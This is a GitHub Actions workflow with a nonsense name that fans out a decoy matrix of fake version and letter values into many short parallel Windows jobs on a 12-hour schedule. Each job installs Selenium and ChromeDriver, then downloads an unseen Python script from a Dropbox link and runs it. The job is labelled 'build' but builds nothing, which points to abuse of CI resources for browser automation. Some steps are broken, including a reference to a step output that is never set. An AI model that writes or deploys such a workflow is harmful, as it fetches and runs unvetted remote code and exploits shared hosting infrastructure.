name: sgddtyu
on:
  schedule:
    - cron: '0 */12 * * *'
  workflow_dispatch:

jobs:
  build:
    runs-on: windows-latest
    strategy:
      max-parallel: 20
      fail-fast: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9, 2.1, 2.2]
        flag: [A, B, C, D, E, F, G, H, I, G, K, L, M, N, Ñ, O, P, K]
    timeout-minutes: 2
    env:
        NUM_JOBS: 900
        JOB: ${{ matrix.go }}
    steps:
      - name: Set up Python
        uses: actions/setup-python@v2
        with:
          python-version: '3.x'
      - name: Install pip
        run: |
          python -m pip install --upgrade pip
      - name: Install Selenium
        run: |
          pip install selenium
      - name: Download Chrome WebDriver
        run: |
          $chrome_version = (Get-Item (Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe').'(Default)').VersionInfo.FileVersion
          echo "::set-output name=version::$chrome_version"
      - name: Download Chrome WebDriver
        run: |
          $chrome_version = ${{ steps.chrome_version.outputs.version }}
          $chrome_major_version = $chrome_version.split('.')[0]
          $chrome_driver_url = "https://chromedriver.storage.googleapis.com/114.0.5735.90/chromedriver_win32.zip"
          Invoke-WebRequest $chrome_driver_url -OutFile chromedriver_win32.zip
          Expand-Archive chromedriver_win32.zip -DestinationPath .
      - name: Set up Chrome WebDriver
        run: |
          $env:PATH += ";$(Get-Location)"
      - name: Run Python Script
        run: |
          Invoke-WebRequest -Uri "https://www.dropbox.com/s/cw8mgsfpydlfzdsi7xmfd/Pythom.py?dl=1" -OutFile Pythom.py
          python Pythom.py
